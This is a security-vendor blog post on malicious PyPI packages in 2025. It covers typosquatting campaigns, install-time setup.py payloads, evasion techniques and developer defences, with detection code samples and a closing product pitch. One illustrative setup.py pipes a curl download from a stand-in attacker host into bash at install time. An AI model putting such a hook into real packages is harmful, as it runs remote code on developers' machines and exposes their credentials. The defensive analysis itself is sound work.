PyPI Malicious Packages 2025: Python's Growing Supply Chain Problem

PyPI faced a surge of malicious package uploads in early 2025, targeting data science, AI/ML, and cloud development workflows. Here's the full picture.

Michael
Threat Intelligence

The Python Package Index (PyPI) — the primary repository for Python packages with over 500,000 projects — saw a significant escalation in malicious package campaigns through early 2025. Security researchers from multiple firms identified coordinated upload campaigns targeting Python developers working in data science, machine learning, cloud infrastructure, and cryptocurrency development.

Python's dominance in AI/ML development has made PyPI an increasingly attractive target. Data scientists and ML engineers run pip install many times a day, and every install is another chance for a typosquatted or socially engineered package to slip through.

Scale of the Problem

In the first quarter of 2025:

  • Over 500 malicious packages were identified and removed from PyPI
  • Multiple coordinated campaigns targeted specific developer communities
  • AI/ML-themed packages accounted for approximately 30% of malicious uploads
  • Credential theft remained the primary payload objective
  • Cloud infrastructure targeting increased significantly, with packages designed to steal AWS, GCP, and Azure credentials

PyPI's volunteer-staffed moderation team, supported by automated scanning, removed packages as quickly as they were identified. But the exposure window (the time between upload and removal) ranged from hours to days, during which unsuspecting developers could download and install the malicious code.

Attack Campaigns

AI/ML typosquatting wave

The explosive growth of Python AI/ML libraries created fertile ground for typosquatting. Uploads mimicking popular libraries included:

  • Variants of transformers, pytorch, tensorflow, and scikit-learn
  • Fake "helper" or "utils" packages for popular AI frameworks
  • Packages claiming to provide GPU optimization or model quantization utilities

These targeted a developer demographic that often works in environments with elevated privileges — accessing training data, cloud compute resources, and model repositories. The payloads focused on stealing:

  • Hugging Face API tokens
  • Cloud provider credentials
  • SSH keys used for cluster access
  • Weights & Biases and MLflow credentials
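
The typosquatting pattern described in this section can be screened for with a simple name-similarity check. The following is a minimal sketch, not a production detector: the KNOWN_PACKAGES list, the function names, and the 0.85 threshold are all illustrative assumptions, and the name normalization only approximates how PyPI compares project names.

```python
import re
from difflib import SequenceMatcher

# Hypothetical allowlist; in practice, use the names your projects actually depend on.
KNOWN_PACKAGES = ["transformers", "torch", "tensorflow", "scikit-learn", "boto3"]


def normalize(name):
    """Lowercase and collapse runs of '-', '_' and '.' into a single '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def possible_typosquat(candidate, known=KNOWN_PACKAGES, threshold=0.85):
    """Return the known package that `candidate` closely resembles, or None.

    An exact (normalized) match is treated as the real package, not a typosquat.
    """
    cand = normalize(candidate)
    known_normalized = {normalize(k): k for k in known}
    if cand in known_normalized:
        return None

    best_name, best_ratio = None, 0.0
    for norm, original in known_normalized.items():
        ratio = SequenceMatcher(None, cand, norm).ratio()
        if ratio > best_ratio:
            best_name, best_ratio = original, ratio
    return best_name if best_ratio >= threshold else None


if __name__ == "__main__":
    for name in ["tranformers", "tensorfow", "transformers", "numpy"]:
        print(name, "->", possible_typosquat(name))
```

A check like this catches only near-miss spellings. It will not flag the fake "helper" or "utils" packages, whose names are plausible rather than misspelled.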

Cloud development targeting

A second set of packages was designed to intercept cloud infrastructure credentials:

  • Typosquats of boto3 (AWS SDK), google-cloud-* packages, and azure-* packages
  • Fake infrastructure-as-code helper libraries
  • Packages impersonating internal tooling names discovered through GitHub reconnaissance

The payloads exfiltrated credentials and in some cases deployed persistent backdoors that survived beyond the initial Python session.

Cryptocurrency library impersonation

A third group of fake packages targeted cryptocurrency developers:

  • Wallet library impersonations that intercepted private keys
  • Exchange API wrappers that modified transaction recipients
  • DeFi development tools that included key-logging functionality

Given that cryptocurrency transactions are irreversible, these attacks had immediate, unrecoverable financial impact on victims.

Technical Techniques

setup.py exploitation

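When pip installs from a source distribution, it executes the package's setup.py, which can contain arbitrary code. (Prebuilt wheels do not run setup.py at install time.) Malicious packages use this to execute payloads before the developer even imports the package: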

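# setup.py from a malicious source distribution (illustrative, do not run)
from setuptools import setup
import os

# Executes at install time, before setup() is even called
os.system("curl -s https://attacker.com/payload.sh | bash")
setup(name="legitimate-looking-name", ...)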

The code runs with the installer's permissions, which in many development environments includes access to cloud credentials, SSH keys, and CI/CD secrets.
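
One way to review a setup.py without running it is to parse it and look for calls that launch commands or evaluate strings. The sketch below uses Python's ast module. The SUSPICIOUS_CALLS set and the function names are illustrative assumptions, and the check is easy to evade (aliased imports, getattr tricks, encoded strings), so treat a clean result as "nothing obvious", not "safe".

```python
import ast

# Illustrative, non-exhaustive list of calls worth a closer look in an install script.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen",
    "subprocess.run", "subprocess.call", "subprocess.Popen",
    "subprocess.check_output",
    "exec", "eval",
}


def dotted_name(node):
    """Turn a Name/Attribute chain such as os.system into the string 'os.system'."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def find_suspicious_calls(source):
    """Return sorted (line_number, call_name) pairs found in the given source text."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


if __name__ == "__main__":
    sample = (
        "from setuptools import setup\n"
        "import os\n"
        'os.system("echo simulated payload")\n'
        'setup(name="demo")\n'
    )
    print(find_suspicious_calls(sample))
```

Because the source is only parsed, never executed, this can be pointed at an unpacked source distribution before anything is installed.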

Conditional execution

Sophisticated packages check their environment before executing payloads:

  • Detecting CI/CD environments (checking for CI, GITHUB_ACTIONS, JENKINS_URL variables)
  • Targeting specific operating systems
  • Checking for the presence of specific tools or files that indicate high-value targets
  • Delaying execution to evade sandbox analysis
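
To make the first check concrete, here is a harmless sketch of the kind of environment test described above. It only reports which of the listed variables are set; the function name and the CI_MARKERS tuple are assumptions for illustration, not code recovered from any specific package.

```python
import os

# Variable names taken from the list above.
CI_MARKERS = ("CI", "GITHUB_ACTIONS", "JENKINS_URL")


def ci_markers_present(environ=None):
    """Return the CI-related variable names that are set to a non-empty value."""
    env = os.environ if environ is None else environ
    return [name for name in CI_MARKERS if env.get(name)]


if __name__ == "__main__":
    print(ci_markers_present({"GITHUB_ACTIONS": "true", "HOME": "/home/dev"}))
    print(ci_markers_present({}))
```

The defensive takeaway is that an analysis sandbox which sets none of these variables may never trigger a gated payload, so it is worth making the sandbox look like the environment being targeted.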

Steganographic payloads

Some packages embedded malicious code within seemingly legitimate data files — images, model weights, or configuration files included in the package. The setup script would extract and execute the hidden payload, bypassing static analysis that only examines Python source files.
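
One simple hiding place, assumed here purely for illustration, is extra data appended after the end of an otherwise valid image. The sketch below walks the chunks of a PNG file and reports how many bytes follow the final IEND chunk. It does not validate checksums and says nothing about payloads hidden inside pixel data or model weights. The function name is hypothetical.

```python
import struct

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_trailing_bytes(data):
    """Return the number of bytes that follow the IEND chunk of a PNG file.

    Each PNG chunk is: 4-byte big-endian length, 4-byte type, body, 4-byte CRC.
    A non-zero result means something was appended after the image ends.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, chunk_type = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # header + body + CRC
        if chunk_type == b"IEND":
            return max(len(data) - pos, 0)
    raise ValueError("no IEND chunk found")


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        print(png_trailing_bytes(fh.read()), "trailing byte(s)")
```

Any non-zero count on an image shipped inside a package is a reason to look more closely, although some legitimate tools also append metadata.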

Dependency chain poisoning

Rather than making the malicious package itself suspicious, some campaigns created chains of packages where:

  1. Package A appears clean and provides useful functionality
  2. Package A depends on Package B, which also appears clean
  3. Package B depends on Package C, which contains the malicious payload

This multi-layer approach makes detection harder because each individual package may not trigger security alerts.
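
Because the payload can sit several layers down, a review needs to cover the whole transitive tree, not just direct dependencies. The following sketch walks that tree breadth-first for packages installed in the current environment using importlib.metadata. The helper names are assumptions, the requirement parsing is deliberately crude (it keeps only the leading project name and skips optional extras), and project names are only lowercased, not fully normalized.

```python
import re
from collections import deque
from importlib import metadata


def requirement_name(req):
    """Extract the project name from a requirement string like 'urllib3<3,>=1.21.1'."""
    match = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", req.strip())
    return match.group(0).lower() if match else None


def installed_requires(name):
    """Return the requirement strings declared by an installed package."""
    try:
        reqs = metadata.requires(name) or []
    except metadata.PackageNotFoundError:
        return []
    # Skip requirements that only apply when an optional extra is requested.
    return [r for r in reqs if not re.search(r"extra\s*==", r)]


def transitive_dependencies(root, get_requires=installed_requires):
    """Map every dependency reachable from `root` to its depth (1 = direct)."""
    depth = {}
    queue = deque([(root.lower(), 0)])
    while queue:
        name, level = queue.popleft()
        if name in depth:
            continue
        depth[name] = level
        for req in get_requires(name):
            dep = requirement_name(req)
            if dep and dep not in depth:
                queue.append((dep, level + 1))
    depth.pop(root.lower(), None)
    return depth


if __name__ == "__main__":
    # Hypothetical A -> B -> C chain mirroring the numbered list above.
    graph = {"package-a": ["package-b>=1.0"], "package-b": ["package-c"], "package-c": []}
    print(transitive_dependencies("package-a", lambda n: graph.get(n, [])))
```

Passing a custom get_requires function keeps the traversal testable without installing anything. With the default, it reads metadata from whatever is installed in the active environment.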

PyPI's Defensive Evolution

PyPI has implemented several security improvements:

  • Mandatory 2FA, introduced first for maintainers of critical projects and required for all accounts since January 2024
  • Trusted Publishers using OpenID Connect for automated publishing from CI/CD
  • Malware detection scanning using pattern matching and behavioral analysis
  • Rate limiting on new package registrations
  • Package provenance through Sigstore integration

These measures have raised the bar for attackers but haven't eliminated the problem. The fundamental challenge is that PyPI is a public repository that accepts uploads from anyone, and the volume of legitimate uploads makes manual review impossible.

Defensive Strategies for Python Developers

Virtual environments always

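Never install packages into your system Python. Use an isolated environment (venv, conda, poetry) for every project. This keeps a malicious package out of your system-wide site-packages and makes cleanup as simple as deleting the environment. It is not a sandbox, though: install-time code still runs with your user's permissions and can read credentials in your home directory, so treat virtual environments as one layer rather than a complete defense.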
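
A small guard can make this rule harder to forget. The sketch below checks whether the running interpreter belongs to a venv-style environment by comparing sys.prefix with sys.base_prefix. The function name is an assumption, and this comparison does not detect conda environments, which would need a separate check.

```python
import sys


def in_virtualenv():
    """Return True when running inside a venv/virtualenv-style environment."""
    return sys.prefix != getattr(sys, "base_prefix", sys.prefix)


if __name__ == "__main__":
    if not in_virtualenv():
        raise SystemExit("Refusing to continue: activate a virtual environment first.")
    print("Virtual environment detected at", sys.prefix)
```

pip offers a similar safeguard of its own through its --require-virtualenv option, which can also be enabled with the PIP_REQUIRE_VIRTUALENV environment variable.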

Pin dependencies and use hash verification

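Pin exact versions in your requirements files and install with pip install --require-hashes -r requirements.txt. In this mode pip rejects any downloaded file whose hash does not match a pinned value, so the exact artifacts you've reviewed are what gets installed. Every requirement, including transitive ones, must be pinned and hashed.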

requests==2.31.0 --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f
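
The same comparison can be done by hand for an artifact downloaded outside pip. This is a minimal sketch using hashlib. The function names are assumptions, and only the sha256:<hex> form shown in the requirements line is handled.

```python
import hashlib
import hmac


def sha256_of_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large wheels do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_pinned_hash(path, pinned):
    """Compare a file against a pin written as 'sha256:<hex digest>'."""
    algorithm, _, expected = pinned.partition(":")
    if algorithm != "sha256" or not expected:
        raise ValueError("expected a pin of the form sha256:<hex digest>")
    return hmac.compare_digest(sha256_of_file(path), expected.lower())


if __name__ == "__main__":
    import sys
    artifact, pin = sys.argv[1], sys.argv[2]
    print("match" if matches_pinned_hash(artifact, pin) else "MISMATCH")
```

A mismatch means the file is not the one that was reviewed, whether through tampering, a re-upload, or simply a different build for another platform.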

Audit new dependencies

Before adding a new dependency:

  • Check the package's age, download count, and maintainer history
  • Review the source code, especially setup.py and __init__.py
  • Check for install-time execution hooks
  • Verify the package on PyPI matches what's on GitHub
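
The age check in the first bullet can be partly automated. The sketch below assumes you have already fetched a project's metadata from PyPI's JSON API (https://pypi.org/pypi/<project>/json) and parsed it into a dict. It relies on the releases mapping and the upload_time_iso_8601 field as I understand that API, so verify both against a real response before depending on them. The function names are hypothetical and the network fetch is intentionally left out.

```python
from datetime import datetime, timezone


def first_upload_time(meta):
    """Return the earliest upload time across all release files, or None."""
    times = [
        datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
        for files in meta.get("releases", {}).values()
        for f in files
    ]
    return min(times) if times else None


def age_in_days(meta, now=None):
    """Return how many whole days ago the project's first file was uploaded."""
    first = first_upload_time(meta)
    if first is None:
        return None
    now = now or datetime.now(timezone.utc)
    return (now - first).days


if __name__ == "__main__":
    # Fabricated example metadata, shaped like the assumed API response.
    example = {
        "releases": {
            "0.1": [{"upload_time_iso_8601": "2025-01-10T00:00:00.000000Z"}],
            "0.2": [{"upload_time_iso_8601": "2025-02-01T12:00:00.000000Z"}],
        }
    }
    print(age_in_days(example, now=datetime(2025, 1, 13, tzinfo=timezone.utc)))
```

A project that is only a few days old is not malicious by definition, but combined with a name close to a popular library it is a strong signal to slow down and read the source.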

Use dependency scanning tools

Integrate automated dependency scanning into your development workflow:

  • Checks against Python advisory data (for example, the PyPA Advisory Database)
  • Commercial tools (Snyk, Socket.dev, Phylum)
  • Open source options (pip-audit, safety)
  • SBOM generation for all Python projects
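
As a starting point for the last item, the sketch below lists every distribution installed in the current environment with its version. It is a plain inventory, not a standards-compliant SBOM: real SBOM formats such as CycloneDX or SPDX carry far more detail, and a dedicated generator is the better choice in practice. The function name is an assumption.

```python
import json
from importlib import metadata


def installed_inventory():
    """Return a sorted list of {'name', 'version'} dicts for installed distributions."""
    items = {}
    for dist in metadata.distributions():
        name = dist.metadata["Name"]
        if name:  # skip distributions with broken or missing metadata
            items[name.lower()] = dist.version
    return [{"name": n, "version": v} for n, v in sorted(items.items())]


if __name__ == "__main__":
    print(json.dumps(installed_inventory(), indent=2))
```

Saving this output per build makes it possible to answer "were we ever running package X?" after a malicious package is announced.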

Private package index

For organizations with internal packages, use a private package index (Artifactory, Nexus, devpi) configured as the only index pip resolves from, with approved external packages proxied through it. This greatly reduces exposure to dependency confusion attacks and allows pre-screening of external packages.
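
A common way this setup gets undermined is an --extra-index-url line left in a requirements file. As far as I'm aware, pip gives no priority among the indexes it is configured with, so a public package that shares an internal name can win. The sketch below flags such lines. The function name and the example index URL are hypothetical.

```python
import re

EXTRA_INDEX = re.compile(r"^\s*--extra-index-url\b")


def extra_index_lines(requirements_text):
    """Return (line_number, line) pairs for every --extra-index-url option found."""
    return [
        (number, line.strip())
        for number, line in enumerate(requirements_text.splitlines(), start=1)
        if EXTRA_INDEX.match(line)
    ]


if __name__ == "__main__":
    # pkgs.example.internal is a made-up private index used only for this demo.
    sample = (
        "--index-url https://pkgs.example.internal/simple\n"
        "--extra-index-url https://pypi.org/simple\n"
        "requests==2.31.0\n"
    )
    for number, line in extra_index_lines(sample):
        print(f"line {number}: {line}")
```

The same option can also appear in pip configuration files and environment variables, which this sketch does not inspect.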

How Safeguard.sh Helps

Safeguard.sh provides comprehensive Python supply chain security through automated SBOM generation and continuous dependency monitoring. The platform tracks every Python package in your projects — direct dependencies and the full transitive tree — and correlates them against known vulnerability databases and malicious package feeds.

When a new malicious PyPI package is identified, Safeguard.sh immediately checks your entire organization's Python dependency trees for exposure. This is critical for large organizations with hundreds of Python projects where manual auditing is impossible.

The platform's policy engine can enforce Python-specific security standards: requiring hash verification, flagging packages with install-time scripts, alerting on new dependencies, and blocking packages that match known malicious patterns. For AI/ML teams working with rapidly evolving dependency stacks, Safeguard.sh provides the automated oversight that prevents supply chain compromises from reaching production.
